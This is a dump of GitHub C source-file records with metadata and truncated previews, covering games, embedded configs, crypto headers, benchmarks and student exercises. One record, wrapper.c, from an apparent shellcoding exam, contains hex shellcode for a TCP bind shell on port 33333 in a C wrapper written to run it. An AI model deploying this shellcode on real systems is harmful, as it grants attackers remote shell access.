2016-10-23T14:47:32
2016-10-14T16:54:43
C
UTF-8
C
false
false
5,001
c
/* * All the daemon and fuse functions are in here * * @(#)daemons.c 4.24 (Berkeley) 02/05/99 * * Rogue: Exploring the Dungeons of Doom * Copyright (C) 1980-1983, 1985, 1999 Michael Toy, Ken Arnold and Glenn Wichman * All rights reserved. * * See the file LICENSE.TXT for full copyright and licensing informatio...
[ "lynn@foldr.moe" ]
lynn@foldr.moe
f1201a33c89b8b1696ac49e8d1cf50fe7ebf880b
e2a21e10eba742e387aafbdaa6a459872bc1546d
/library/foundation/src/vscf_rsa_public_key_internal.h
a0335d8e94c54c8e4a2f825d063308d77044b6eb
[ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "LicenseRef-scancode-warranty-disclaimer", "BSD-2-Clause" ]
permissive
VirgilSecurity/virgil-crypto-c
81fea098caad2688729dace72a77799d52966286
40ae5231264c8f2d79354922fac15d96021aa8b5
refs/heads/main
2023-08-21T13:00:57.538177
2023-08-13T21:19:37
2023-08-13T21:19:37
119,018,897
34
10
NOASSERTION
2023-08-13T21:19:39
2018-01-26T07:15:37
C
UTF-8
C
false
false
3,853
h
// @license // -------------------------------------------------------------------------- // Copyright (C) 2015-2022 Virgil Security, Inc. // // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are //...
[ "sergey.seroshtan@gmail.com" ]
sergey.seroshtan@gmail.com
844c90597b26a29b425f723c18b601bed98b789a
654f9a4f51696e70c992ffa61f57647ee937dd60
/Projects/STM32F446ZE-Nucleo/Examples/CRC/CRC_Example/Inc/stm32f4xx_hal_conf.h
8430832a54998a52ffce5d4888ced36e86cad443
[ "BSD-2-Clause", "Apache-2.0" ]
permissive
980f/STM32CubeF4
b48b4197339426953019d338a399611c7c0a2c6c
4b4b7c17135ff062f0e2dd4f6798583aa3ffc08f
refs/heads/master
2023-02-02T21:56:00.651533
2020-12-21T18:03:39
2020-12-21T18:03:39
292,336,672
0
0
NOASSERTION
2020-09-02T16:32:06
2020-09-02T16:32:06
null
UTF-8
C
false
false
16,540
h
/** ****************************************************************************** * @file stm32f4xx_hal_conf.h * @author MCD Application Team * @brief HAL configuration file. ****************************************************************************** * @attention * * <h2><center>&copy; COPYRI...
[ "ali.labbene@st.com" ]
ali.labbene@st.com
3cd45f73f11492863e36790bcae75a08f0f7b82f
34233a39445f4d6a3bb8b7b9d780358c6dd3eca0
/tools/usbkprintf/main.c
02e904f613679add131866daf6706350a95bc6e3
[ "BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference" ]
permissive
pspdev/psplinkusb
57386e3cfde825dcb1d259efd758b50c534552f0
d8c81925bf7e7bbad3303ec099ffc987a58b309d
refs/heads/master
2023-08-04T13:22:39.113417
2023-07-26T11:52:48
2023-07-26T11:52:48
1,255,326
42
38
BSD-3-Clause
2023-07-26T11:52:50
2011-01-14T18:02:23
C
UTF-8
C
false
false
2,909
c
/* * PSPLINK * ----------------------------------------------------------------------- * Licensed under the BSD license, see LICENSE in PSPLINK root for details. * * main.c - PSPLINK USB Kprintf driver * * Copyright (c) 2006 James F <tyranid@gmail.com> * */ #include <pspkernel.h> #include <pspdebug.h> #include...
[ "dan.peori@oopo.net" ]
dan.peori@oopo.net
3005f37182e953bc684695886635b47b23effe71
976f5e0b583c3f3a87a142187b9a2b2a5ae9cf6f
/source/reactos/dll/directx/wine/d3dx9_36/extr_effect.c_d3dx9_base_effect_get_annotation_by_name.c
b5bcbcd6dc85b146296ff4dbda04bfaf9081f281
[]
no_license
isabella232/AnghaBench
7ba90823cf8c0dd25a803d1688500eec91d1cf4e
9a5f60cdc907a0475090eef45e5be43392c25132
refs/heads/master
2023-04-20T09:05:33.024569
2021-05-07T18:36:26
2021-05-07T18:36:26
null
0
0
null
null
null
null
UTF-8
C
false
false
1,712
c
#define NULL ((void*)0) typedef unsigned long size_t; // Customize by platform. typedef long intptr_t; typedef unsigned long uintptr_t; typedef long scalar_t__; // Either arithmetic or pointer type. /* By default, we understand bool (as a convenience). */ typedef int bool; #define false 0 #define true 1 /* Forward d...
[ "brenocfg@gmail.com" ]
brenocfg@gmail.com
e7cf56143bf7e1d4e0238c16f3f3fe95210a9c92
4aae202ba7c2b87c8dd40e46c82b260db851ef98
/INFO_1/CLASE_8/app8c.c
7e8a107306e77498e225b7a010f93dd40acb31c0
[]
no_license
danijaf/info1
2681e63f3581628364cad9099a13bed3367e4331
e9e25b7255202a712791cc533a5e6204141adbd9
refs/heads/master
2020-05-23T09:27:53.824519
2019-05-28T22:03:45
2019-05-28T22:03:45
186,706,990
0
0
null
null
null
null
UTF-8
C
false
false
1,860
c
/*8c) Tomar el ejercicio 8b) y modificarlo para que el resultado sea almacenado en un nuevo parámetro pasado por referencia. La función no devuelve nada. El prototipo de la función sería: void sumar ( int* var1, int* var2, int* res); */ #include <stdio.h> int pedirEntero(); void suma(int *var1, int *var2, int *re...
[ "noreply@github.com" ]
danijaf.noreply@github.com
70c11766efcee533248d4d0a43a341d22e5cf8f1
20e298232484eecfb3b8f2752e21166f30fb086f
/Vector.c
fd8db7ab3aab3310a21f5170824b47a0c3593284
[]
no_license
mokshkori/DSA
9b99e3c57593a6b66e6f166206cb5b5672846983
743492e373d3e0d7a4524a98cc6cb6e15dfaf94f
refs/heads/master
2023-03-29T20:57:52.211863
2021-03-26T05:49:24
2021-03-26T05:49:24
350,742,079
0
0
null
null
null
null
UTF-8
C
false
false
1,198
c
#include <stdio.h> #include <malloc.h> #define MIN_SIZE 20 struct Vector { int *ar; int size; int capacity; }; void add(struct Vector *vector, int item) { int size = vector->size; vector->ar[size++] = item; vector->size = size; if (vector->size > vector->capacity / 2) { print...
[ "amankori8@gmail.com" ]
amankori8@gmail.com
3ba785842b1d159c79ee65eff0dbb05f51ad13ef
a25e3fb5c87bd485f3655fccae619b3ff91b8ca5
/_unsigned.c
cef7a25557a592dabb8001dd9ea11538c6fe403c
[]
no_license
GreatestM/printf
baf5430bcf5b6f5fb75564ac71b8cb974ae224c2
af9593de269364a3daf591d27888aa59cd60ebe0
refs/heads/master
2023-08-10T18:17:56.416133
2021-10-05T18:41:28
2021-10-05T18:41:28
413,739,846
0
2
null
null
null
null
UTF-8
C
false
false
721
c
#include "holberton.h" #include <stdio.h> #include <stdarg.h> #include <unistd.h> #include <stdlib.h> /** * printUnsigned - Print Unsigned * @lista: Var list * Return: number u */ int printUnsigned(va_list lista) { int *cont; unsigned int num; cont = malloc(sizeof(*cont)); if (!cont) exit(-1); *cont = 0; num = v...
[ "noreply@github.com" ]
GreatestM.noreply@github.com
6b7d39209fdd3c9934eb02701d3ccee7c01b8a9d
94c8d45b22e533f9341298c393f75d7567134078
/3/3.c
419e5e3a0c84943f2de36e3d20c468b8985c806a
[]
no_license
daige/c-puzzles
17d252334124c63529f57cd6d5f678eeb52d6caf
25e67795d03f86e76f31f39761b074fdf78c15fc
refs/heads/master
2020-06-05T03:50:52.703877
2014-07-04T05:52:41
2014-07-04T05:52:41
null
0
0
null
null
null
null
UTF-8
C
false
false
215
c
#include <stdio.h> enum {false,true}; int main() { int i = 1; printf("false=%d\n",false); printf("true=%d\n",true); do { printf("%d\n",i); i++; if( i < 15 ) continue; }while(false); return 0; }
[ "superdaige@gmail.com" ]
superdaige@gmail.com
89448be78c472bc57350bacfed493dbc97aa9183
840fa08ec342b3f433995cbf32461525ef6c9b63
/Generated_Code/USB0.h
b2e619f7f9a970d401d692ce13d782ea9b55d5ed
[]
no_license
j3sq/NORwayFlasherKL25Z
eaeeb72505eadee5fdc5f7eb412c988e6e88a560
e2f4494217ab8600e9e0cecee39873371cb38ee5
refs/heads/master
2016-09-06T14:42:50.683379
2014-10-18T19:43:42
2014-10-18T19:43:42
null
0
0
null
null
null
null
UTF-8
C
false
false
13,994
h
/* ################################################################### ** THIS COMPONENT MODULE IS GENERATED BY THE TOOL. DO NOT MODIFY IT. ** Filename : USB0.h ** Project : ProcessorExpert ** Processor : MKL25Z128VLK4 ** Component : Init_USB_OTG ** Version : Component 01.004, Dri...
[ "jqut.dev@gmail.com" ]
jqut.dev@gmail.com
c867940dbb5989c1e8d23a153afe6aad95dc0c6a
d2ad14371e35d3415bb4d711e33e3c9f1bf30152
/2D_CD.c
98a8150189be42213ff41529e17fcdcb5a3c1e46
[]
no_license
bernie6430/CFD
e94c3d2c96ad5201d2694081e6157cb38d67a340
c10a46436b5d81bba37bf40e722a7134219e02f6
refs/heads/master
2021-09-05T11:20:39.468241
2018-01-26T21:04:27
2018-01-26T21:04:27
103,307,401
1
0
null
null
null
null
UTF-8
C
false
false
5,299
c
#include<stdio.h> #include<stdlib.h> #include<math.h> const double k = 1000; const double delx = 0.1; const double dely = 0.1; const double A=0.001; const double T = 100.0; const double Q = 500000.0; void TridiagonalSolve(const double *, const double *, double *, double *, double *, unsigned int); void Exact_Sol(doub...
[ "bernie6430@gmail.com" ]
bernie6430@gmail.com
c73f6e8731e58e6a52be8d8e02ff99b472c4d2cc
79a3ef846e10732b32a9deaf8fd300c8e023e965
/buildprocess/sub.c
e6282b4778ad18561c6f7e4dffa7b2b2d049b6b1
[]
no_license
shravani-97/desdOS-200250330080
bfbd3651aba9d468eb070b42ca090ac4cf93e7e9
8f89ac9589990eefcd6caee0270a47ba10e26c14
refs/heads/master
2023-01-07T13:10:12.870165
2020-11-06T06:49:09
2020-11-06T06:49:09
305,071,059
0
0
null
null
null
null
UTF-8
C
false
false
45
c
int sub(int a,int b) { return a-b; }
[ "shravanipullabotla@gmail.com" ]
shravanipullabotla@gmail.com
d66596652257d970d4ce9442c6d51fc9fe8bf8d9
e6c2c7010a5308da3f46cc3475bb7002218a4d33
/ios/Pods/Headers/Private/UrbanAirship-iOS-SDK/UAInAppMessageDefaultDisplayCoordinator+Internal.h
e582db32ef00d4ce48180e5dad218ceaf884c777
[]
no_license
lordandares/ViroReact
6d0e8af1e3e1fc09921b762bbd7a33183a5fda8c
fa97a1dc5b441a79f465384f22d971772039b974
refs/heads/master
2022-11-29T20:10:27.508449
2020-08-06T13:53:00
2020-08-06T13:53:00
285,582,381
1
0
null
null
null
null
UTF-8
C
false
false
106
h
../../../UrbanAirship-iOS-SDK/AirshipKit/AirshipKit/ios/UAInAppMessageDefaultDisplayCoordinator+Internal.h
[ "aeriverosalguedo@gmail.com" ]
aeriverosalguedo@gmail.com
c6905bc606a76f4289bd151e90e45648f51304b7
bc6430c488a225a2796b50632cd4a88395777a76
/RRC_staticlib/asn1c_36331_d10/MobilityFromEUTRACommand-v8a0-IEs.c
a6f66f439dc90026dc54e2d21bfd1c1c248becd8
[]
no_license
shflyeagle/EagleEye
5f312eaaf9a8a4e2bf5786a38d4f3d6d690d71b7
98b3b802a572ad81bc346905dfdf8396a8189912
refs/heads/master
2020-05-07T08:33:53.684195
2019-04-10T07:53:56
2019-04-10T07:53:56
180,328,573
0
0
null
null
null
null
UTF-8
C
false
false
2,914
c
/* * Generated by asn1c-0.9.27 (http://lionet.info/asn1c) * From ASN.1 module "EUTRA-RRC-Definitions" * found in "/home/qiongbod/asn1c-0.9.27/asn1c/input/36331-d10.asn" * `asn1c -S /home/qiongbod/asn1c-0.9.27/skeletons -fcompound-names -fwide-types -gen-PER` */ #include "MobilityFromEUTRACommand-v8a0-IEs.h" st...
[ "qiongbo.deng@nokia-sbell.com" ]
qiongbo.deng@nokia-sbell.com
4a0a140c27230aa5ab84393bea2e729c577c43ce
bf4472047541cf42b5c7777cb871c20645405ac5
/x86/exam/assignment1_tcpbindshell/shellcode/wrapper.c
4465647c81eaae8df15088ce3798535b3cab1d03
[]
no_license
0x5929/Assembly
906e02ab12fc95c4a20193b520fa454b5c36293d
bd252308b35a3cb21c41f807ccaffe31b666cf21
refs/heads/master
2021-09-26T21:56:57.170989
2018-11-03T04:54:47
2018-11-03T04:54:47
null
0
0
null
null
null
null
UTF-8
C
false
false
748
c
#include <stdio.h> #include <string.h> #define PORT "\xAD\x9C" // 33333 in regular order, can be configured to any open port on victim machine unsigned char shellcode[] = \ "\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x43\x52\x66\x68" PORT "\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\...
[ "work.kevin.ren@gmail.com" ]
work.kevin.ren@gmail.com
6d446ccbafef260d9f3e2a42a25cbc765661af8b
6d971612a752b8f892044ebad9c51ed293670061
/Programs/P84.C
61b07c40f0b276191af44de2c415805ed8a4e042
[]
no_license
tanmaypardeshi/C-programs
a4ec51301a5bd6e11a42dd8549da75ccbdcf4281
c01a23dc850260889f8e7e7c0f3744e9a5eabb27
refs/heads/master
2020-12-01T08:17:20.125915
2020-05-11T05:03:49
2020-05-11T05:03:49
230,590,106
0
0
null
null
null
null
UTF-8
C
false
false
824
c
/*Write a fn which returns the second largest element from an array of int values. Do not use sorting and nested loop*/ #include<stdio.h> #include<conio.h> #define SIZE 50 /*fn decln*/ void main() { int i,nos[SIZE],noe,no; clrscr(); printf("Enter the number of elements of array:- "); scanf("%d"...
[ "tanmaypardeshi@gmail.com" ]
tanmaypardeshi@gmail.com
ee47201ca0d491096ec75bac12040ac82ad570bd
f4f456860304c2c3d6faeeb11d3121eb029d65b7
/lib/my/my_isneg.c
2d889dc66d65a8da36c448ecf25873a29a398fba
[]
no_license
Brukols/Epitech-MyRPG
79ce767d4ff338c5be3decc6b7d4f2d5e629016c
22f90a21e23787a8160ffd71a6c8ac040ca0d400
refs/heads/master
2022-04-13T03:39:01.399503
2020-04-04T08:23:26
2020-04-04T08:23:26
250,198,897
0
1
null
null
null
null
UTF-8
C
false
false
233
c
/* ** EPITECH PROJECT, 2019 ** my_isneg ** File description: ** lib */ void my_putchar(char c); int my_isneg(int n) { if (n < 0) my_putchar('N'); else my_putchar('P'); my_putchar('\n'); return (0); }
[ "amaury.lecomte@epitech.eu" ]
amaury.lecomte@epitech.eu
65f594b7e233a7609565bb534f94622e9964367d
3bc3f080f46a6897c6d88f036c784c63b3673979
/src/emu/video/voodoo.c
d5cca3f85661017c77332b098be683ade25aae78
[]
no_license
vikke/mame_0145
bec0f81aba918c8ca5579a13f72e3c8efc7d0065
e9b4636543b017c2a6cdd6cddeab4afc02740241
refs/heads/master
2021-07-04T03:00:14.861010
2021-06-02T10:07:17
2021-06-02T10:07:17
4,586,522
0
0
null
null
null
null
UTF-8
C
false
false
227,388
c
/*************************************************************************** voodoo.c 3dfx Voodoo Graphics SST-1/2 emulator. **************************************************************************** Copyright Aaron Giles All rights reserved. Redistribution and use in source and bi...
[ "vikke.bsd@gmail.com" ]
vikke.bsd@gmail.com
241ad2380a86ac80f3a71cf9857a79459b3de3e8
4651eefdc31af8a946c036be2204e01a683b47bb
/개념콕콕/4-5/4-5/main.c
d328d947c10c857a6dbbcc427c633afa41a9bb0a
[]
no_license
cmilk18/cstudy
3bcb29c046331e6fe4abc8ec3b4ec43423b8de2f
6f0bc79e167fa0bd9d2e964355281c4bd987a3e0
refs/heads/master
2020-04-09T12:05:05.730901
2018-12-04T10:08:36
2018-12-04T10:08:36
160,335,087
0
0
null
null
null
null
UHC
C
false
false
290
c
/*20180918 강준희*/ #include<stdio.h> int main(void) { int score = 95; printf("90점 이상 100점 이하이가? : %d\n", score >= 90 && score <= 100); printf("0점 또는 100점인가? : %d\n", score == 0 || score == 100); printf("0점인가? : %d\n", !score); return 0; }
[ "junhee1883@naver.com" ]
junhee1883@naver.com
bfe2012ca137f1bcc1966a971de8322f149bfd28
2a6c58bda503beeed6083562caea181522034661
/xv6_rpi2_port/include/syscall.h
da13563150ede7e12a1b854c83a95ade4c876258
[ "MIT" ]
permissive
gudbrandsc/System-Call-Tracer-for-xv6-and-Process-Hibernation
34cc85cac033ec89f0e6c48691abe7e8033be3de
1f5638eb1c2326c8ace8080661aef365d86ed0b8
refs/heads/master
2020-04-16T14:41:50.206415
2019-01-14T14:49:11
2019-01-14T14:49:11
165,677,292
0
1
null
null
null
null
UTF-8
C
false
false
535
h
// System call numbers #define SYS_fork 1 #define SYS_exit 2 #define SYS_wait 3 #define SYS_pipe 4 #define SYS_read 5 #define SYS_kill 6 #define SYS_exec 7 #define SYS_fstat 8 #define SYS_chdir 9 #define SYS_dup 10 #define SYS_getpid 11 #define SYS_sbrk 12 #define SYS_sleep 13 #define SYS...
[ "gschistad@dons.usfca.edu" ]
gschistad@dons.usfca.edu
d980a06eff530b01d025fef7db2cd83c4849041e
018d16966c3af8ed6e36c5f4fc19ffb072628467
/code.c
309f4c65f77ac9c6262a18e021648ac9f9d13607
[ "MIT" ]
permissive
AlexandrosPlessias/SimpleListManagment
2dcf3fc593efc1c2b38bd7f98e35b622774d7dd8
9bd9489394768e7608e3b94fe9efbf93ab5ede80
refs/heads/master
2022-11-09T12:32:45.130621
2020-06-26T10:39:06
2020-06-26T10:39:06
null
0
0
null
null
null
null
UTF-8
C
false
false
9,349
c
#include <stdio.h> /*Call the library Standard Input and Output (for the use of basic functions such as printf & scanf).*/ #include <stdlib.h> /*We call on the Standard General Utilities Library (for use of atoi & atof).*/ #include <math.h> /*We call the library mathematical (to use the functions sqrt & pow).*/ #de...
[ "noreply@github.com" ]
AlexandrosPlessias.noreply@github.com
411ea9230f0ae10a9cdefcfe3db0b6e9fe6f0da2
2705bcc54347019a87dfbd985c4d1a579906040b
/CommonC/BitSets.h
ed34eefefced9e34a53489002bce44293d6b6291
[ "BSD-2-Clause" ]
permissive
ScrimpyCat/CommonC
08a93d6403c37703fea918c782fc2d83636d0d48
7b03ec0c963de2277ba006ebc7876302045aec0d
refs/heads/master
2023-09-01T21:40:38.108270
2023-08-27T06:45:48
2023-08-27T06:45:48
72,793,672
9
3
null
2018-06-09T13:09:42
2016-11-03T22:48:15
Objective-C
UTF-8
C
false
false
2,544
h
/* * Copyright (c) 2023, Stefan Johnson * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this list * o...
[ "sj@scrimpycat.io" ]
sj@scrimpycat.io
4831ca442365a6953e2c0df6277b699bdb8a71fc
ac362bb8969d647cd219430bc71c831d894e531c
/sys/arch/amd64/amd64/identcpu.c
7ed08eddaaa3afe4a3771b07da648d9e1ac51076
[]
no_license
noud/mouse-bsd-4.0.1
efb3b16fcc872ab227e6bb651cf1e836796a0804
4c0a1e08df407a759afac2d6a98507df94f5f814
refs/heads/master
2023-02-24T23:42:54.060718
2020-08-16T20:10:53
2020-08-16T20:10:53
334,536,412
0
0
null
null
null
null
UTF-8
C
false
false
5,262
c
/* $NetBSD: identcpu.c,v 1.7.2.3 2007/09/12 10:05:04 msaitoh Exp $ */ /* * Copyright (c) 2003 Wasabi Systems, Inc. * All rights reserved. * * Written by Frank van der Linden for Wasabi Systems, Inc. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided tha...
[ "mouse@Rodents-Montreal.ORG" ]
mouse@Rodents-Montreal.ORG
2d53f47ab2d59dd940fb42e87222410da8851f11
7ca665202061b36fcc4702b4c0e8f028f965b52a
/contextCreation/main.c
a4fea9bc2dbcb61d62da8a8c03741fbb79aff122
[]
no_license
AndreaMelle/openglExamples
c0b7f0107efe8348a69bc0faf0c2556251703993
80708f13f0e03d835ffabf9169f375d3d06757ae
refs/heads/master
2020-05-24T14:15:04.398487
2014-01-08T16:43:15
2014-01-08T16:43:15
null
0
0
null
null
null
null
UTF-8
C
false
false
1,319
c
#define GLEW_STATIC #include <stdlib.h> #include <stdio.h> #include <GL/glew.h> #include <GLFW/glfw3.h> static void error_callback(int error, const char* description) { fputs(description, stderr); } static void key_callback(GLFWwindow* window, int key, int scancode, int action, int mods) { if (key == GLFW_KE...
[ "andrea.melle@eurecom.fr" ]
andrea.melle@eurecom.fr
77e00fa7307eea59ef31b3407a9345ccbead7e0c
6e13f94c8c3e5e3d11a13f4b2e89ca9b12f583bf
/81.c
dd87ded85806c13759e2fd9dd9ff557a9698fd49
[]
no_license
Nirmalasumi1/Nirmala
918e1b7d81670f96cae53e5cdb526fd676048515
bd97ba822d30cd6f653e0787fc5f7e44ebbe3f24
refs/heads/master
2021-01-21T12:30:58.974238
2018-03-16T11:26:20
2018-03-16T11:26:20
102,076,202
0
0
null
null
null
null
UTF-8
C
false
false
253
c
#include<stdio.h> int main() { int a,b,a1,b1,a2,b2,d1,d2,d3; printf("enter the values:"); scanf("%d %d",&a,&b); scanf("%d %d",&a1,&b1); scanf("%d %d",&a2,&b2); d1=b-a; d2=b1-a1; d3=b2-a2; printf("%d\n %d\n %d",d1,d2,d3); return 0; }
[ "noreply@github.com" ]
Nirmalasumi1.noreply@github.com
749aa7886a06b272c20ac24975f51b7306836bcd
d8b35ec03c297c106008e67e63cf350a2f5ae07c
/52_동적메모리로 정수 5개를 처리하기.c
53f87c553aa85b52ee86890b94f2b88acd669bd2
[ "MIT" ]
permissive
DojunPark/C_Programming
b44f5da3378404a164fde55ffeb9f441629947e7
c9c71c8a022573200043448e08339439ac01b424
refs/heads/master
2021-03-01T05:05:28.719133
2020-04-04T13:07:57
2020-04-04T13:07:57
245,755,678
0
0
null
null
null
null
UHC
C
false
false
365
c
#include <stdio.h> #include <stdlib.h> int main(void) { int *pi, i; pi = (int *)malloc(5 * sizeof(int)); if(pi == NULL) { printf("동적메모리 할당에 실패하였습니다.\n"); exit(1); } pi[0] = 100; pi[1] = 200; pi[2] = 300; pi[3] = 400; pi[4] = 500; for(i = 0; i < 5; i++) { printf("%d\n", *(pi + i)); } free(pi); ...
[ "dojun.parkk@gmail.com" ]
dojun.parkk@gmail.com
07841d364a3851e932d6d1c79a89a75dafc7a950
b477697f95728fbf8d1759a73858860c9620c3ab
/peripheral/dmt/processor/dmt_p32mx340f128l.h
0c0a62f82bcd02d5450091275fa9dccf2f9398b8
[]
no_license
gmuro/harmony-v2_06-framework
12bcb30c2dc9f4737aab8762da8b25632822d00e
2196b67de35af9d1126b539b08324cf72ed13521
refs/heads/master
2022-12-07T19:24:34.649360
2022-11-18T22:16:49
2022-11-18T22:16:49
190,900,209
1
1
null
null
null
null
UTF-8
C
false
false
2,748
h
/* Created by plibgen $Revision: 1.31 $ */ #ifndef _DMT_P32MX340F128L_H #define _DMT_P32MX340F128L_H /* Section 1 - Enumerate instances, define constants, VREGs */ #include <xc.h> #include <stdbool.h> #include "peripheral/peripheral_common_32bit.h" /* Default definition used for all API dispatch functi...
[ "gustmuro@gmail.com" ]
gustmuro@gmail.com
254d447c05fa02c78e3c356ff09348927f05c59d
4839d7320c88b45235abe6aa6a7c657239173b27
/Module_RF_UC/Sources/RF.c
6ed8917559900f7570d7b415d4e0b6657d80bff3
[]
no_license
AxelJacquot/Projet_Robocup
3fe147c4e2040e214db08674cf8eca0375581158
bb7b1c37c78574923ffd1e9a7a9dc477074e592e
refs/heads/master
2020-03-21T03:15:29.228721
2018-06-21T09:09:38
2018-06-21T09:09:38
138,044,416
1
0
null
null
null
null
ISO-8859-1
C
false
false
4,021
c
/* * RF.c * * Created on: Jun 6, 2018 * Author: dwenm */ #include "RF.h" unsigned char ADDR_RF_RX[]={0xB3,0xB3,0xB3,0xB3,0xB3}; //adresse du module 1 unsigned char ADDR_RF_TX[]={0x42,0x42,0x42,0x42,0x42}; //adresse du module 2 void Receive_Register (unsigned char Addr_reg, unsigned char *read, unsi...
[ "axel.jacquot@ynov.com" ]
axel.jacquot@ynov.com
87e3938fef98b01d9fa6fae16be97d21c227a270
24d856d98c85a319d53be2768ccc176a50873fa3
/linux-lts-quantal-3.5.0/arch/c6x/include/asm/ptrace.h
b04ff5964258bea32365c1edc15157a8aa04174f
[ "GPL-1.0-or-later", "Linux-syscall-note", "GPL-2.0-only", "BSD-2-Clause" ]
permissive
dozenow/shortcut
a4803b59c95e72a01d73bb30acaae45cf76b0367
b140082a44c58f05af3495259c1beaaa9a63560b
refs/heads/jumpstart-php
2020-06-29T11:41:05.842760
2019-03-28T17:28:56
2019-03-28T17:28:56
200,405,626
2
2
BSD-2-Clause
2019-08-03T19:45:44
2019-08-03T17:57:58
C
UTF-8
C
false
false
4,913
h
/* * Copyright (C) 2004, 2006, 2009, 2010 Texas Instruments Incorporated * Author: Aurelien Jacquiot (aurelien.jacquiot@jaluna.com) * * Updated for 2.6.34: Mark Salter <msalter@redhat.com> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public...
[ "jflinn" ]
jflinn
f79bb6fd58695ba8bb7fb558db6b25d44b5c6b6b
f16af0daae3d88df06fe45b57d762fe0ed0da6d6
/EXLib/hiredis/win/deps/hiredis/adapters/libuv.h
950f259ebe0e31dd3119e8ce4d5b80fefee37303
[ "BSD-3-Clause" ]
permissive
lop-dev/lop-lib
1f15d48beca11dd7e4842b96780adecab186bea5
ae22a29c82e31cbca53155fb0a1155569dfe2681
refs/heads/master
2023-06-23T09:45:43.317656
2021-07-25T02:11:19
2021-07-25T02:11:19
131,691,063
16
13
null
null
null
null
UTF-8
C
false
false
2,608
h
#ifndef __HIREDIS_LIBUV_H__ #define __HIREDIS_LIBUV_H__ #include <uv.h> #include "../hiredis.h" #include "../async.h" #include <string.h> typedef struct redisLibuvEvents { redisAsyncContext* context; uv_poll_t handle; int events; } redisLibuvEvents; int redisLibuvAttach(redi...
[ "38876514+lop-dev@users.noreply.github.com" ]
38876514+lop-dev@users.noreply.github.com
07cb4b4f2f69c52764177d666811514389b0f41b
acd9091316b17268680dd39f1e10d74677a894a2
/src/main.c
057209ce1c43c169f04b695154f2541f465accc4
[]
no_license
octronic-uk/SuperInfringementBros
882196713ef9dd656a44890220265c108d63ff9b
f9038c8ab1eb4eb61f1a0d0864fca5d718337913
refs/heads/master
2021-01-22T09:10:09.460131
2017-03-09T13:21:54
2017-03-09T13:21:54
81,937,054
0
0
null
null
null
null
UTF-8
C
false
false
624
c
#include <SDL2/SDL.h> #include "game.h" #include "title.h" #include "high_score.h" #include "menu.h" #include "engine.h" #include "constants.h" #include "logger.h" int main(int argc, char** argv) { // Init & Setup engine_t *engine = engineAllocate(); int initResult = engineInit(engine, 1280 ,720, "Supe...
[ "ash@octronic.co.uk" ]
ash@octronic.co.uk
abb8d37c860160616a44092ed0660b99114b4bea
d411ca376411781d397e16e4874185bca181cf3a
/savanna_clnt/savanna_serv_cpu.c
20fc02a4affe518ca8c2e820f01d0b2b4b6b27f0
[]
no_license
chiynglee/PathSavanna
7fc32d5f46018dfc530da47dc26f6453d9349236
e420a2fcf9ef6c0a2e89a33c57de0ccbc17acdb3
refs/heads/main
2023-01-28T21:02:19.311735
2020-12-15T16:20:44
2020-12-15T16:20:44
321,722,101
0
0
null
null
null
null
UHC
C
false
false
32,360
c
//////////////////////////////////////////////// // savanna server in DomG // //////////////////////////////////////////////// #include <stdio.h> #include <string.h> #include <stdlib.h> #include <stdbool.h> #include <errno.h> #include <unistd.h> #include <memory.h> #include <netdb.h> #include <signal.h> #include...
[ "noreply@github.com" ]
chiynglee.noreply@github.com
000c733b30b412349ec1441dd5533703d4d70471
4fe0220d177429db878b0f7e71f44db01493cf1c
/0x1C-binary_trees/binary_trees.h
4fd6bdf006d1a62d9c2d3858aaf247c66dbdc09d
[]
no_license
Majeekfinger/holbertonschool-low_level_programming
828e233276dc3dfb47e4c550943ba5cd7b8d8ba1
e2eea067c43510c944b272dcca0fad5f633f1103
refs/heads/master
2023-03-16T01:05:11.819468
2019-01-25T05:16:39
2019-01-25T05:16:39
null
0
0
null
null
null
null
UTF-8
C
false
false
2,022
h
#ifndef _BINARY_TREES_H_ #define _BINARY_TREES_H_ /* LIBRARIES */ #include <stdio.h> #include <stdlib.h> #include <stddef.h> /* STRUCTURES */ /** * struct binary_tree_s - Binary tree node * * @n: Integer stored in the node * @parent: Pointer to the parent node * @left: Pointer to the left child node * @right: P...
[ "fpcantor@gmail.com" ]
fpcantor@gmail.com